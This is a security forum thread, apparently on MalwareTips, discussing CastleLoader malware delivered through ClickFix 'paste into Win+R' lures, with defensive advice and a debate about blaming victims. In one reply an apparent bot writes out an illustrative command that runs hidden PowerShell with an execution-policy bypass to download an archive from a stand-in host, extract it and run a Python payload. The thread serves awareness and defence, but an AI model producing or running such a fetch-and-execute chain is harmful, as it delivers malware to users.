CastleLoader malware, known for Clickfix related attack, has been upgraded with a stealthy Python loader that helps it slip past security defenses.

[Khushal]

Content source

https://blackpointcyber.com/blog/python-driven-castleloader-analysis/

Snakes in the Castle: Inside the Walls of Python-Driven CastleLoader Delivery.

The Blackpoint SOC recently responded to an incident initiated through the tried-and-true ClickFix technique; a social engineering method consistently leveraged across numerous campaigns this past year. These lures convince users to press Win + R to open the Windows Run dialog box, then enter a command presented as a harmless “human verification” step or similar prompt. This pattern has been repeatedly used to deploy everything from information stealers to remote access trojans (RATs), and it has also become one of the primary delivery vectors for a newer loader family known as CastleLoader.

Snakes in the Castle: Inside the Walls of Python-Driven CastleLoader Delivery

See how threat actors are using ClickFix lures and windowless Python to deploy CastleLoader malware. Read the full APG technical analysis.

blackpointcyber.com

 

[Bot]

Snakes in the Castle: Inside the Walls of Python-Driven CastleLoader Delivery.

The Blackpoint SOC recently responded to an incident initiated through the tried-and-true ClickFix technique; a social engineering method consistently leveraged across numerous campaigns this past year. These lures convince users to press Win + R to open the Windows Run dialog box, then enter a command presented as a harmless “human verification” step or similar prompt. This pattern has been repeatedly used to deploy everything from information stealers to remote access trojans (RATs), and it has also become one of the primary delivery vectors for a newer loader family known as CastleLoader.

Snakes in the Castle: Inside the Walls of Python-Driven CastleLoader Delivery

See how threat actors are using ClickFix lures and windowless Python to deploy CastleLoader malware. Read the full APG technical analysis.

blackpointcyber.com

View attachment 293635

This is a good catch – CastleLoader is a nice example of how “simple” social engineering plus LOLBIN-style abuse can still be very effective.

Quick breakdown of the CastleLoader chain (from the article)

• User is tricked via ClickFix into pressing Win + R and pasting a command.
• That command abuses conhost.exe/cmd.exe to download a .tar archive (e.g. pt.tar) into %AppData%.
• A dropper extracts the archive into some etc-like folder under AppData and runs pythonw.exe on a compiled Python bytecode file (e.g. python.cat).
• That Python stager decrypts and injects a CastleLoader shellcode payload straight into memory.
• CastleLoader then calls out to a [/service/download/] path using a fake GoogleBot user agent to pull an encrypted payload.
• The loader uses the first 16 bytes as an XOR key, decrypts the final payload, and runs it in memory only (fileless execution).

Why this is effective

• Relies on the user to execute the initial command, bypassing email/attachment filters.
• Abuses built‑in binaries (conhost/cmd) and common interpreters (pythonw) that many EDRs have to treat carefully.
• Fileless / in‑memory final stage makes it harder for traditional AV to catch on disk.

Defensive takeaways

• User awareness
  Never run Win + R commands that come from:
  • Pop‑ups claiming “human verification”
  • Phone calls / chats from “support”
  • Emails / DMs with “quick fix” instructions
  If a website tells you to open Run and paste a long command, that’s a massive red flag.
  
• Hardening endpoints
  • Restrict or monitor python.exe/pythonw.exe usage on systems that don’t legitimately need Python.
  • Use application control (SRP/AppLocker/WDAC) to block running interpreters or archives from user‑writable paths like %AppData%.
  • Alert on unusual conhost.exe / cmd.exe spawned from browsers or office apps, especially if they pull from the internet.
• Network / SOC side
  • Watch for suspicious [/service/download/] paths and fake GoogleBot user‑agents to non‑Google infra.
  • Look for outbound traffic shortly after a new Python process starts from AppData.
  • Hunt for .tar archives in user profiles that appear shortly before odd script/loader activity.
• Detection & response
  • If you suspect CastleLoader or a similar loader, isolate the host and grab full EDR telemetry / memory dumps.
  • Because the final payload is in‑memory, rely on behavior‑based detection and memory scanning rather than just on‑disk AV scans.

If you’re worried you may have run something like this

• Disconnect the machine from the network (unplug Ethernet / disable Wi‑Fi).
• Run a full scan with a reputable AV/EDR and consider a second‑opinion scanner.
• If this is a business environment, escalate to your security team or incident‑response partner immediately.
• On MalwareTips, you can also post detailed logs (per the Malware Removal section rules) so malware‑removal helpers can take a look.

In short, CastleLoader is another reminder that “paste this into Win+R” is a very dangerous pattern – blocking that behavior and closely monitoring scripting/LOLBIN abuse can go a long way.

 

[Sampei.Nihira]

@Bot

What would be the command to paste?
I'm asking you because I don't understand what it would be.

 

[Bot]

@Bot

What would be the command to paste?
I'm asking you because I don't understand what it would be.

The short answer is: there isn’t one single fixed “CastleLoader command” to paste, and I don’t know the exact string from that specific case. These campaigns change the command line regularly, and the blog post doesn’t provide the full live command.

What you’d paste into Win + R is usually a long command that:

• Starts conhost.exe and/or cmd.exe
• Runs a secondary tool like powershell.exe, curl.exe, bitsadmin.exe, etc.
• Downloads a file (in this case a .tar archive) from a URL
• Saves it somewhere under %AppData%
• (Optionally) extracts it and then starts pythonw.exe on a hidden script/bytecode file

So, conceptually, a CastleLoader/ClickFix command might look something like this (very simplified and with placeholders):

conhost.exe /v1 cmd.exe /c "powershell -ExecutionPolicy Bypass -WindowStyle Hidden `
  iwr hxxp://malicious-site[.]com/pt.tar -OutFile %APPDATA%\pt.tar
  && tar -xf %APPDATA%\pt.tar -C %APPDATA%\etc
  && %APPDATA%\etc\pythonw.exe %APPDATA%\etc\python.cat"

This is only an illustrative example with fake domains and paths so you can see the structure; it is not something you should ever run.

What you should watch for instead

If a website, email, chat, or “support” person ever tells you to:

• Press Win + R
• Paste a long, complicated command that includes things like conhost.exe, cmd.exe, powershell.exe, curl, bitsadmin, or a strange URL
• And says it’s for “human verification”, “fixing an error”, “driver update”, or “security check”

…then you should treat that as malicious by default and do not run it.

If you want, you can paste any example you’ve seen (with the URL obfuscated, e.g. `hxxp://domain[.]com`) and I can help you break down what each part is doing in more detail.

 

[Parkinsond]

Is WHHL blocking tar files by default?

 

[Sampei.Nihira]

@Bot

In your opinion, on a scale of 1 (intelligence of a bacterium) to 10 (average human intelligence), what intelligence score should be given to someone who, even unknowingly, pastes such a long command?

 

[Bot]

@Bot

In your opinion, on a scale of 1 (intelligence of a bacterium) to 10 (average human intelligence), what intelligence score should be given to someone who, even unknowingly, pastes such a long command?

About WHHL and .tar files

I’m not completely sure of every current WHH Light (WHHL) default, but as far as I know:

• WHHL mainly focuses on blocking execution of risky formats (EXE, script files, etc.) and restricting where they can run.
• .tar is an archive format, not directly executable, so it’s usually not on default “blocked extensions” lists.
• The real danger in the CastleLoader case is:
  • the command that downloads the archive, and
  • the Python/loader components executed from user folders after extraction.

So even if WHHL doesn’t explicitly “block .tar files”, a proper WHHL/SRP setup should still:

• Block or restrict python.exe/pythonw.exe and other interpreters from user‑writable locations.
• Block unknown EXE/DLL/script execution from places like %AppData%.

Because I can’t see your exact WHHL version/profile, I can’t state its defaults with 100% certainty. To be sure, I’d recommend:

• Check WHHL’s GUI for the list of blocked extensions and restricted paths.
• Or ask in the WHH/Hard_Configurator thread on MalwareTips, where the developer (Andy Ful) and advanced users can confirm the current defaults.

About the “intelligence scale” question

On that 1–10 scale, pasting such a command says almost nothing about someone’s intelligence.

Attackers design these lures to trick:

• Stressed or hurried users
• Non‑technical people
• Even very technical people who are distracted or trust the source

So my “score” for a person who pastes such a command would still be around 10 (average human) – they’re just a normal person who got hit by well‑crafted social engineering. It’s not an IQ test; it’s an awareness and context issue.

The productive takeaway isn’t to judge the victim, but to:

• Teach: “Never paste long Win+R / PowerShell / CMD commands from websites or strangers.”
• Add technical controls (like WHHL, browser protections, AV/EDR) to catch it when someone inevitably slips.

In short: WHHL focuses more on blocking execution than on blocking .tar themselves, and falling for a Win+R trick is a very human mistake, not a sign of “bacterium‑level” intelligence.

 

[Sampei.Nihira]

@Bot

You're wrong, maybe 2/5... and in my opinion, I've been too generous.

 

[Bot]

@Bot

You're wrong, maybe 2/5... and in my opinion, I've been too generous.

Heh, I get the joke.

But I’ll still defend the “victim” a bit here.

Social engineering ≠ low intelligence
Attackers specifically design these tricks so that even smart, experienced people can fall for them when:

• They’re in a hurry
• They trust the brand/logo/layout they see
• The wording feels “official” or “technical”

I’ve seen:

• Developers paste malicious PowerShell from “Stack Overflow–like” pages
• Admins run bogus commands sent by someone pretending to be their boss
• IT staff install remote tools for “audit” or “support” that turned out to be RATs

All of them would easily be 8–10 on any “intelligence scale” – just caught off‑guard.

Why I push back on the 2/5 idea
When we frame it as “only idiots fall for this”, two bad things happen:

• People who do fall for it feel ashamed and hide incidents instead of reporting them.
• Others think “I’m not stupid, so I’d never fall for that” – which is exactly what attackers want.

It’s much more accurate (and useful) to say:

• “Anyone can be tricked; that’s why we need good habits and technical safeguards.”
• “Win+R + long mystery command = instant red flag, no matter who you are.”

So you can keep your “2/5 with generosity” for the fun of it , but from a security point of view, I’d still rank them as a normal human who didn’t yet learn that very specific red flag. The blame belongs on the attacker, not the target.

 

[Parkinsond]

@Bot

In your opinion, on a scale of 1 (intelligence of a bacterium) to 10 (average human intelligence), what intelligence score should be given to someone who, even unknowingly, pastes such a long command?

It is a matter of "knowledge" rather than "intelligence".
If I have read before about this method, I will not perfrom the action.
If I have not, I "might" do the action.
If my grandma did it, she is ignorant, not stupid.
If she is ignorant, it is kind of you to teach her, rather calling her stupid.

 

[Bot]

It is a matter of "knowledge" rather than "intelligence".
If I have read before about this method, I will not perfrom the action.
If I have not, I "might" do the action.
If my grandma did it, she is ignorant, not stupid.
If she is ignorant, it is kind of you to learn her, rather calling her stupid.

You’ve summed it up very well: this is much more about knowledge and context than raw “intelligence”.

Why people paste those commands

• If someone has never heard that “Win+R + long command from a website/stranger = danger”, they have no mental alarm bell for it.
• If the page/message looks official and uses some technical wording, non‑technical users often assume “this is how computers are fixed”.
• Stress, hurry, or fear (“your account will be locked”, “you have viruses”) pushes people to act without thinking.

In that situation:

• Your grandma isn’t stupid – she’s uninformed about a specific attack pattern.
• Even very smart, well‑educated people can do the same when it’s outside their field.

Why it matters to frame it as “ignorance”, not “stupidity”

• If users feel judged as “dumb”, they are less likely to admit mistakes or report incidents.
• Calling it a knowledge gap makes it something that can be fixed by teaching, not by shaming.
• Security improves faster when we expect that normal people will click things, paste things, and make mistakes – and we build both education and technical controls around that.

So, yes:

• If they’ve read about this method before and still paste it, that’s a bad decision.
• If they’ve never seen it, it’s a training/awareness gap, not low intelligence.

The kind and effective response is exactly what you wrote: explain why it’s dangerous, and teach them the rule of thumb – “Never paste long commands from random sites or strangers into Win+R / CMD / PowerShell.”

 

[Sampei.Nihira]

Yes, attackers exploit deception (social engineering).
People who use PCs must learn to defend themselves against deception.

Or get infected.
Then you'll learn the hard way.

P.S.

I prefer the first option.

 

[Jonny Quest]

It is a matter of "knowledge" rather than "intelligence".
If I have read before about this method, I will not perfrom the action.
If I have not, I "might" do the action.
If my grandma did it, she is ignorant, not stupid.
If she is ignorant, it is kind of you to teach her, rather calling her stupid.

It may be along the same idea of not knowing (compared to intelligence) that it's not normal to have to allow/verify a pop up CAPTCHA prompt.

Thread 'iClicker hack targeted students with malware via fake CAPTCHA'

May 11, 2025

The website of iClicker, a popular student engagement platform, was compromised in a ClickFix attack that used a fake CAPTCHA prompt to trick students and instructors into installing malware on their devices.

iClicker is a subsidiary of Macmillan and is a digital classroom tool that allows instructors to take attendance, ask live questions or surveys, and track student engagement. It is widely used by 5,000 instructors and 7 million students at colleges and universities across the United States, including the University of Michigan, the University of Florida, and universities in...

• Gandalf_The_Grey
• Replies: 2
• Forum: News Archive

• 

 

[Parkinsond]

It may be along the same idea of not knowing (compared to intelligence) that it's not normal to have to allow/verify a pop up CAPTCHA prompt.

Thread 'iClicker hack targeted students with malware via fake CAPTCHA'

May 11, 2025

The website of iClicker, a popular student engagement platform, was compromised in a ClickFix attack that used a fake CAPTCHA prompt to trick students and instructors into installing malware on their devices.

iClicker is a subsidiary of Macmillan and is a digital classroom tool that allows instructors to take attendance, ask live questions or surveys, and track student engagement. It is widely used by 5,000 instructors and 7 million students at colleges and universities across the United States, including the University of Michigan, the University of Florida, and universities in...

• Gandalf_The_Grey
• Replies: 2
• Forum: News Archive

• 

That is why I proposed replacing one of less necessary modules of ICDL by cybersecurity.

 

[Victor M]

There is a group polilcy item to stop Win+R from working: Configuration → Administrative Templates → Start Menu and Taskbar . Remove Run menu from Start Menu = Enabled. Haven't tried it.

 

[Parkinsond]

There is a group polilcy item to stop Win+R from working: Configuration → Administrative Templates → Start Menu and Taskbar . Remove Run menu from Start Menu = Enabled. Haven't tried it.

Nice move for protecting those who do not know; somesort of SRP.